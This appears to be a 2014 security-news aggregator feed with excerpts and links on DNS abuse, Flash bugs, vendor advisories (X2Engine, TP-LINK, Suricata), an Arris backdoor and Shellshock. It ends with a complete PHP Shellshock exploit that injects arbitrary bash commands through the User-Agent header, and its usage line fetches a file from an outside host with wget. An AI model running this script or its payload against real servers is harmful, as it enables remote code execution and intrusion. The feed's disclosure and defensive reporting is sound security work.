September 22, 2014, 1:42 pm
A Terabyte stream of anonymized DNS data collected every day from around the world reveals lots of interesting things. Nominum researchers have developed algorithms to sort through trillions of transactions and find what is usually a tiny fraction that aren't legitimate. Some are queries for controlling malware, some are to send spam, and most recently lots more queries are for DDoS.
A recent trend we're seeing is attackers sending carefully crafted queries targeting a small set of domains each day.
more here............http://www.circleid.com/posts/20140922_digging_deep_into_dns_data_discloses_damaging_domains/
![]()
↧
September 22, 2014, 1:45 pm
As discussed in parts 1 and 2 of this series, the most common VPN endpoints (responders) found supporting Aggressive Mode negotiation are Cisco devices. However, they are also almost always supported by a second factor authentication mechanism known as XAUTH. I originally wrote a shell script that leverages VPNC, one of the command line VPN clients discussed in this post, to brute force valid XAUTH credentials. Then I decided to write it all out from scratch in Python, but I lost interest for a few months and put it on the backburner. Anyway I’ve finished the tool now
more here.............http://blog.spiderlabs.com/2014/09/cracking-ike-missionimprobable-part3.html
![]()
↧
↧
September 22, 2014, 1:47 pm
In my previous blog, I talked about a method for acquiring bare-metal images directly from NAND Flash memory. In that post, I used a Verifone POS device as my reverse engineering example. The next step is to dissect the image and change it into a more meaningful form for our investigation. Let’s start with making sense of the out-of-band (OOB) data from the image and removing bad blocks. After that, we will have a flat image that can be used for further analysis.
more here............http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Reverse-engineering-NAND-Flash-Memory-POS-device-case-study-part/ba-p/6627072
![]()
↧
September 23, 2014, 2:29 am
A couple of weeks ago, Adobe released security bulletin APSB14-21, including 8 fixes for bugs reported by Project Zero. Full details of these bugs are now public in our bug tracker. Some of the more interesting ones are a double free in the RTMP protocol, or an integer overflow concatenating strings. Again, we’d like to thank Adobe for a response time well ahead of our standard 90-day disclosure deadline.
The focus of this post is an integer overflow leading to a buffer overflow in an ActionScript API.
more here...........http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html
![]()
↧
September 23, 2014, 2:34 am
I've been meaning to review Mean IO for some time and finally found the time to take a quick look at it
I was really happy to see to see that Mean IO is using pbkdf/2 for password hashing before storing it. It's using a 16 byte salt created using crypto.randomBytes and it's using 10000 rounds with a keylength of 64 bytes.
The password policy is however pretty weak.
more here.............https://github.com/eoftedal/writings/blob/master/published/mean_io-review.md
![]()
↧
↧
September 23, 2014, 3:37 am
Flash bugs include Flash leak of uninitialized data whilst rendering JPEGs, Flash leak of uninitialized data whilst rendering a 2-component JPEG, Flash leak of uninitialized memory when rendering valid(?) 1bpp image, Flash heap buffer overflow calling copyPixelsToByteArray() on a large ByteArray, Flash leak of uninitialized data when image zlib stream ends prematurely, Flash leak of uninitialized data when JPEG image alpha channel zlib stream ends prematurely and more here.....https://code.google.com/p/google-security-research/issues/list?can=1&q=flash&colspec=ID+Type+Status+Priority+Milestone+Owner+Summary&cells=tiles
![]()
↧
September 23, 2014, 8:19 am
-------------------------------------------------------------------------X2Engine <= 4.1.7 (SiteController.php) PHP Object Injection Vulnerability-------------------------------------------------------------------------[-] Software Link:http://www.x2engine.com/[-] Affected Versions:All versions from 2.8 to 4.1.7.[-] Vulnerability Description:The vulnerable code is located in the "actionSendErrorReport" method defined in /protected/controllers/SiteController.php:153. public function actionSendErrorReport(){154. if(isset($_POST['report'])){155. $errorReport = $_POST['report'];156. $errorReport = unserialize(base64_decode($errorReport));157. if(isset($_POST['email'])){158. $errorReport['email'] = $_POST['email'];159. }User input passed through the "report" POST parameter is not properly sanitized before being used in a call to the "unserialize()"function at line 156. This can be exploited to inject arbitrary PHP objects into the application scope, and could allow anattacker to carry out Server-Side Request Forgery (SSRF) and possibly other attacks via specially crafted serialized objects.[-] Solution:Apply the vendor patch or update to version 4.2 or later.[-] Disclosure Timeline:[31/07/2014] - Vendor notified[31/07/2014] - Vendor released security patch: http://x2community.com/?showtopic=1804
[01/08/2014] - CVE number requested[16/08/2014] - CVE number assigned[05/09/2014] - Version 4.2 released[23/09/2014] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2014-5297 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2014-09 ![]()
↧
September 23, 2014, 8:20 am
--------------------------------------------------------------------------------X2Engine <= 4.1.7 (FileUploadsFilter.php) Unrestricted File Upload Vulnerability--------------------------------------------------------------------------------[-] Software Link:http://www.x2engine.com/[-] Affected Versions:Version 4.1.7 and probably prior versions.[-] Vulnerability Description:The vulnerability exists because of the FileUploadsFilter::EXT_BLACKLIST constant, which is a regularexpression for blacklisted files. Due to a lack of case-insensitive matching, the global upload filtercould be bypassed by uploading a malicious file with capital letters within the extension. This can beexploited to upload and execute arbitrary PHP scripts if X2Engine is running on a case-insensitivefilesystem or if the web server is configured to handle files’ extensions in a case-insensitive fashion.[-] Solution:Update to version 4.2 or later.[-] Disclosure Timeline:[01/08/2014] - Vendor notified[02/08/2014] - CVE number requested[16/08/2014] - CVE number assigned[05/09/2014] - Version 4.2 released[23/09/2014] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2014-5298 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2014-10 ![]()
↧
September 23, 2014, 10:08 am
Last year, when the iPhone 5S was released, I showed how you could hack its fancy new TouchID fingerprint sensor. A year and one iPhone 6 later, I’ve done it again.
When the iPhone 6 came out the first thing I wanted to find out was whether or not there had been any changes to the TouchID sensor. I had little expectation that the TouchID sensor would be completely secure, but I hoped at least that there would have been some improvements.
more here..........https://blog.lookout.com/blog/2014/09/23/iphone-6-touchid-hack/
![]()
↧
↧
September 23, 2014, 10:10 am
On September 18, 2014, RiskIQ detected credential-stealing malware being loaded onto users’ computers through a drive-by download at jQuery.com. The attack was carried out using RIG exploit kit to target visitors. RiskIQ was able to confirm with sources at several large organizations that users of jQuery.com were indeed redirected to this exploit kit.
more here............http://www.riskiq.com/resources/blog/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-risk#.VCGpQfldWSo
![]()
↧
September 23, 2014, 11:41 am
We published an article on SSD forensics in 2012. SSD self-corrosion, TRIM and garbage collection were little known and poorly understood phenomena at that time, while encrypting and compressing SSD controllers were relatively uncommon. In 2014, many changes happened. We processed numerous cases involving the use of SSD drives and gathered a lot of statistical data. We now know more about many exclusions from SSD self-corrosion that allow forensic specialists to obtain more information from SSD drives.
more here.........http://articles.forensicfocus.com/2014/09/23/recovering-evidence-from-ssd-drives-in-2014-understanding-trim-garbage-collection-and-exclusions/
![]()
↧
September 23, 2014, 12:32 pm
Advisory Information===============Vendors Contacted: TP-LINKVendor Patched: Yes, Firmware 140916System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), mightaffect others.Versions Affected: 130617 , possibly earlierCVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728Vulnerabilities Description===================# Stored XSS -It is possible inject javascript code via DHCP hostname field,If the administrator will visit the dhcp clients page (web panel)the script will execute.# DoS (web server) -Denial of service condition to the device web server, remotely or locallysend thedevice a "GET" request with an extra "Header" with a long value (A x 3000times).Proof of Concept:============http://elisyan.com/tplink/wdr4300.htmlhttp://elisyan.com/tplink/wdr4300.pyReport Timeline:===========2014-07-04:Vendor notified about the vulnerabilities with all the relevant technicalinformation.2014-09-16:Vendor released a fix.Credits:======The Vulnerabilities was discovered by Oz Elisyan.References:========http://www.tp-link.com/lk/products/details/?model=TL-WDR4300 ![]()
↧
September 23, 2014, 1:26 pm
CVE-2014-6603 suricata 2.0.3 Out-of-bounds access in SSH application parser1. BackgroundSuricata is a high performance Network IDS, IPS and Network Security Monitoring engine developed by the Open Information Security Foundation (OISF).2. Summary InformationIt was found out that the application parser for SSH integrated in Suricata contains a flaw that might lead to an out-of-bounds access. For this reason a Denial of Service towards the Suricata monitoring software might be possible using crafted packets on the monitoring interface.3. Technical DescriptionThe application parser for SSH (src/app-layer-ssh.c) contains a function SSHParseBanner. In case the parsed buffer is either"SSH-2.0\r-MySSHClient-0.5.1\n"or"SSH-2.0-\rMySSHClient-0.5.1\n"the function will behave in the wrong way and attempt either a very big memory allocation or an out of bounds array access with negative index, which also might lead to out-of-bounds write access under certain conditions. The problem is caused due to the fact that the end of the banner and start of the software version are computed independently.4. Affected versionsAffected versions are Suricata 2.0.3 and 2.1beta1, older versions might be affected as well.5. FixThe issue will be fixed in Suricata 2.0.4 and in the next upcoming major release. See http://suricata-ids.org/2014/09/23/suricata-2-0-4-available/ for reference.6. Advisory Timeline2014-09-10: Discovered2014-09-12: Reported to vendor by email2014-09-12: Vendor responded, confirmed and provided preliminary fix2014-09-17: Requested CVE2014-09-19: CVE number received2014-09-23: Vendor reported a fixed version released2014-09-23: Published7. CreditThe issue was found bySteffen BauchTwitter: @steffenbauchhttp://steffenbauch.de8. Referenceshttp://www.openinfosecfoundation.org/http://suricata-ids.org/http://suricata-ids.org/2014/09/23/suricata-2-0-4-available/ ![]()
↧
↧
September 23, 2014, 3:25 pm
TripAdvisor has suffered a data breach at its Viator tour-booking and review website.
An estimated 1.4 million Viator customers are potentially affected by the compromise, which the firm admits may have exposed payment card data.
more here...........http://www.theregister.co.uk/2014/09/23/tripadvisor_subsidiary_viator_breach_card_fraud_link/?mt=1411511103040
![]()
↧
September 23, 2014, 3:27 pm
How'd that malware get there?
That's the question you've got to answer for every OSX malware infection. We built OSXCollector to make that easy. Quickly parse its output to get an answer.
more here...........https://github.com/Yelp/osxcollector
![]()
↧
September 24, 2014, 2:17 am
Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW
more here..............http://console-cowboys.blogspot.de/2014/09/arris-cable-modem-backdoor-im.html
![]()
↧
September 24, 2014, 4:28 am
The Acrobat Reader Windows sandbox is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions. This could be used to break out of the sandbox leading to execution at higher privileges.
The specific vulnerability is in the handling of the NtSetInformationFile system call hook. This function attempts to resolve the real destination of the rename. If the destination is a junction it reads the junction destination, however it only does this for the first level so it's possible to have a chain of junctions. This allows code in the sandbox to write an arbitrary file to the filesystem.
more here.............https://code.google.com/p/google-security-research/issues/detail?id=94&can=1
![]()
↧
↧
September 24, 2014, 7:48 am
Bash or the Bourne again shell, is a UNIX like shell, which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, bash has evolved from a simple terminal based command interpreter to many other fancy uses.
In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consists of a name which has a value assigned to it. The same is true of the bash shell. It is common for a lot of programs to run bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), provide a parser for CGI scripts (Apache, etc) or even provide limited command execution support (git, etc)
Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents.
more here............https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
![]()
↧
September 24, 2014, 1:50 pm
The iOS 8 security update bulletin has many fixed bugs, one of which is this one “A double free issue existed in the handling of Mach ports. This issue was addressed through improved validation of Mach ports. CVE-2014-4375 : an anonymous researcher”.
Well, I’ve known this bug for a while and it was insanely fun as anti-debugging measure because of its random effects when triggered. For example, sometimes you get an immediate kernel panic, others nothing happens, and most of the time you get weird cpu spikes not attributed to any process, or system lock ups after a while. This used as anti-debugging measure is extremely fun because the attacker will suffer from totally random events and the bug is easy to hide in plain sight.
The following sample code will trigger it
more here............http://reverse.put.as/2014/09/24/the-double-free-mach-port-bug-the-short-story-of-a-dead-0day/
![]()
↧
September 25, 2014, 12:29 am
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
Test CGI Code : #!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
);
if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
die("Command sent to the server!\n");
else
die("Connection Error\n");
?>
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
![]()
↧